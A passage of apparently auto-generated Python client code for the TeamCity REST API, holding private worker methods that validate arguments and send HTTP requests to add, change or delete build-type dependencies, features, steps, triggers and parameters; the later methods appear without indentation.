        'btLocator': locator.locator_id if isinstance(locator, TeamCityObject) else locator,  # noqa: E501
    }
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='ArtifactDependency',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __add_build_type_with_http_info(self, **kwargs):  # noqa: E501
    """add_build_type  # noqa: E501

    Worker behind ``add_build_type``: validates keyword arguments and
    performs the HTTP call via the shared API client.

    >>> thread = api.__add_build_type_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param BuildType body:
    :param str fields:
    :return: BuildType
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the standard transport-control flags.
    all_params = [
        'body', 'fields',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]  # noqa: E501
    params = {}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_build_type" % key
            )
        params[key] = val
    collection_formats = {}
    path_params = {}
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='BuildType',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __add_feature_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_feature  # noqa: E501

    Worker behind ``add_feature``: validates arguments and performs the
    HTTP call via the shared API client.

    >>> thread = api.__add_feature_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req: bool
    :param str bt_locator: (required)
    :param str fields:
    :param Feature body:
    :return: Feature
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the standard transport-control flags.
    all_params = [
        'bt_locator', 'fields', 'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]  # noqa: E501
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_feature" % key
            )
        params[key] = val
    # verify the required parameter 'bt_locator' is set
    if params.get('bt_locator') is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_feature`")  # noqa: E501
    collection_formats = {}
    # A TeamCityObject may be given in place of a locator string; use its id.
    locator = params['bt_locator']
    path_params = {
        'btLocator': locator.locator_id if isinstance(locator, TeamCityObject) else locator,  # noqa: E501
    }
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = params.get('body')
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Feature',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __add_feature_parameter_with_http_info(self, bt_locator, feature_id, parameter_name, **kwargs):  # noqa: E501
    """add_feature_parameter  # noqa: E501

    Sets one parameter on a build-type feature. Synchronous by default;
    pass ``async_req=True`` to perform the request asynchronously and
    receive the request thread instead of the result.

    >>> thread = api.__add_feature_parameter_with_http_info(bt_locator, feature_id, parameter_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str parameter_name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'feature_id', 'parameter_name', 'body',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator, 'feature_id': feature_id,
              'parameter_name': parameter_name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_feature_parameter" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'feature_id', 'parameter_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `add_feature_parameter`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('feature_id', 'featureId'),
                               ('parameter_name', 'parameterName')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/parameters/{parameterName}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_snapshot_dep_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_snapshot_dep  # noqa: E501

    Adds a snapshot dependency to a build type. Synchronous by default;
    pass ``async_req=True`` to perform the request asynchronously and
    receive the request thread instead of the result.

    >>> thread = api.__add_snapshot_dep_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param SnapshotDependency body:
    :return: SnapshotDependency
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'fields', 'body', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_snapshot_dep" % key
            )
        params[key] = val
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_snapshot_dep`")  # noqa: E501

    # TeamCityObject instances are substituted by their locator id.
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params = {'btLocator': locator}

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'POST',
        path_params,
        query_params,
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='SnapshotDependency',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_step_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_step  # noqa: E501

    Adds a build step to a build type. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__add_step_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param Step body:
    :return: Step
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'fields', 'body', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_step" % key
            )
        params[key] = val
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_step`")  # noqa: E501

    # TeamCityObject instances are substituted by their locator id.
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params = {'btLocator': locator}

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps', 'POST',
        path_params,
        query_params,
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='Step',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_step_parameter_with_http_info(self, bt_locator, step_id, parameter_name, **kwargs):  # noqa: E501
    """add_step_parameter  # noqa: E501

    Sets one parameter on a build step. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__add_step_parameter_with_http_info(bt_locator, step_id, parameter_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str parameter_name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'step_id', 'parameter_name', 'body',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator, 'step_id': step_id,
              'parameter_name': parameter_name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_step_parameter" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'step_id', 'parameter_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `add_step_parameter`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('step_id', 'stepId'),
                               ('parameter_name', 'parameterName')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}/parameters/{parameterName}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_template_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_template  # noqa: E501

    Attaches a template to a build type. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__add_template_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param BuildType body:
    :param bool optimize_settings:
    :param str fields:
    :return: BuildType
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'body', 'optimize_settings', 'fields',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_template" % key
            )
        params[key] = val
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_template`")  # noqa: E501

    # TeamCityObject instances are substituted by their locator id.
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params = {'btLocator': locator}

    query_params = []
    if 'optimize_settings' in params:
        query_params.append(('optimizeSettings', params['optimize_settings']))
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/templates', 'POST',
        path_params,
        query_params,
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='BuildType',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_trigger_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_trigger  # noqa: E501

    Adds a build trigger to a build type. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__add_trigger_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str fields:
    :param Trigger body:
    :return: Trigger
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'fields', 'body', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_trigger" % key
            )
        params[key] = val
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_trigger`")  # noqa: E501

    # TeamCityObject instances are substituted by their locator id.
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params = {'btLocator': locator}

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/triggers', 'POST',
        path_params,
        query_params,
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='Trigger',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __add_vcs_root_entry_with_http_info(self, bt_locator, **kwargs):  # noqa: E501
    """add_vcs_root_entry  # noqa: E501

    Adds a VCS root entry to a build type. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__add_vcs_root_entry_with_http_info(bt_locator, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param VcsRootEntry body:
    :param str fields:
    :return: VcsRootEntry
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'body', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'bt_locator': bt_locator}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_vcs_root_entry" % key
            )
        params[key] = val
    if params['bt_locator'] is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `add_vcs_root_entry`")  # noqa: E501

    # TeamCityObject instances are substituted by their locator id.
    locator = params['bt_locator']
    if isinstance(locator, TeamCityObject):
        locator = locator.locator_id
    path_params = {'btLocator': locator}

    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs-root-entries', 'POST',
        path_params,
        query_params,
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='VcsRootEntry',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __change_artifact_dep_setting_with_http_info(self, bt_locator, artifact_dep_locator, field_name, **kwargs):  # noqa: E501
    """change_artifact_dep_setting  # noqa: E501

    Updates one field of an artifact dependency. Synchronous by default;
    pass ``async_req=True`` to perform the request asynchronously and
    receive the request thread instead of the result.

    >>> thread = api.__change_artifact_dep_setting_with_http_info(bt_locator, artifact_dep_locator, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str artifact_dep_locator: (required)
    :param str field_name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'artifact_dep_locator', 'field_name',
                'body', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator,
              'artifact_dep_locator': artifact_dep_locator,
              'field_name': field_name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_artifact_dep_setting" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'artifact_dep_locator', 'field_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `change_artifact_dep_setting`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('artifact_dep_locator', 'artifactDepLocator'),
                               ('field_name', 'fieldName')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/artifact-dependencies/{artifactDepLocator}/{fieldName}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __change_feature_setting_with_http_info(self, bt_locator, feature_id, name, **kwargs):  # noqa: E501
    """change_feature_setting  # noqa: E501

    Updates one setting of a build-type feature. Synchronous by default;
    pass ``async_req=True`` to perform the request asynchronously and
    receive the request thread instead of the result.

    >>> thread = api.__change_feature_setting_with_http_info(bt_locator, feature_id, name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str feature_id: (required)
    :param str name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'feature_id', 'name', 'body', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'bt_locator': bt_locator, 'feature_id': feature_id,
              'name': name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_feature_setting" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'feature_id', 'name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `change_feature_setting`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('feature_id', 'featureId'),
                               ('name', 'name')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/features/{featureId}/{name}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __change_requirement_setting_with_http_info(self, bt_locator, agent_requirement_locator, field_name, **kwargs):  # noqa: E501
    """change_requirement_setting  # noqa: E501

    Updates one field of an agent requirement. Synchronous by default;
    pass ``async_req=True`` to perform the request asynchronously and
    receive the request thread instead of the result.

    >>> thread = api.__change_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str agent_requirement_locator: (required)
    :param str field_name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'agent_requirement_locator', 'field_name',
                'body', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator,
              'agent_requirement_locator': agent_requirement_locator,
              'field_name': field_name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_requirement_setting" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'agent_requirement_locator',
                     'field_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `change_requirement_setting`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('agent_requirement_locator',
                                'agentRequirementLocator'),
                               ('field_name', 'fieldName')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}/{fieldName}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __change_step_setting_with_http_info(self, bt_locator, step_id, field_name, **kwargs):  # noqa: E501
    """change_step_setting  # noqa: E501

    Updates one field of a build step. Synchronous by default; pass
    ``async_req=True`` to perform the request asynchronously and receive
    the request thread instead of the result.

    >>> thread = api.__change_step_setting_with_http_info(bt_locator, step_id, field_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str bt_locator: (required)
    :param str step_id: (required)
    :param str field_name: (required)
    :param str body:
    :return: str
             If the method is called asynchronously,
             returns the request thread.
    """
    accepted = {'bt_locator', 'step_id', 'field_name', 'body',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout'}
    params = {'bt_locator': bt_locator, 'step_id': step_id,
              'field_name': field_name}
    for key, val in six.iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method change_step_setting" % key
            )
        params[key] = val
    # All three path parameters are mandatory.
    for required in ('bt_locator', 'step_id', 'field_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling"
                " `change_step_setting`" % required)

    # TeamCityObject instances are substituted by their locator id.
    path_params = {}
    for py_name, wire_name in (('bt_locator', 'btLocator'),
                               ('step_id', 'stepId'),
                               ('field_name', 'fieldName')):
        value = params[py_name]
        if isinstance(value, TeamCityObject):
            value = value.locator_id
        path_params[wire_name] = value

    # No authentication configured for this endpoint.
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/steps/{stepId}/{fieldName}', 'PUT',
        path_params,
        [],
        {},
        body=params.get('body'),
        post_params=[],
        files={},
        response_type='str',  # noqa: E501
        auth_settings=[],
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def __change_trigger_setting_with_http_info(self, bt_locator, trigger_locator, field_name, **kwargs): # noqa: E501
"""change_trigger_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__change_trigger_setting_with_http_info(bt_locator, trigger_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str trigger_locator: (required)
:param str field_name: (required)
:param str body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'trigger_locator', 'field_name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method change_trigger_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `change_trigger_setting`") # noqa: E501
# verify the required parameter 'trigger_locator' is set
if ('trigger_locator' not in params or
params['trigger_locator'] is None):
raise ValueError("Missing the required parameter `trigger_locator` when calling `change_trigger_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `change_trigger_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'trigger_locator' in params:
if isinstance(params['trigger_locator'], TeamCityObject):
path_params['triggerLocator'] = params['trigger_locator'].locator_id
else:
path_params['triggerLocator'] = params['trigger_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/triggers/{triggerLocator}/{fieldName}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_agent_requirement_with_http_info(self, bt_locator, agent_requirement_locator, **kwargs): # noqa: E501
"""delete_agent_requirement # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_agent_requirement_with_http_info(bt_locator, agent_requirement_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_agent_requirement" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_agent_requirement`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `delete_agent_requirement`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_all_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""delete_all_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_all_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_all_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `delete_all_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
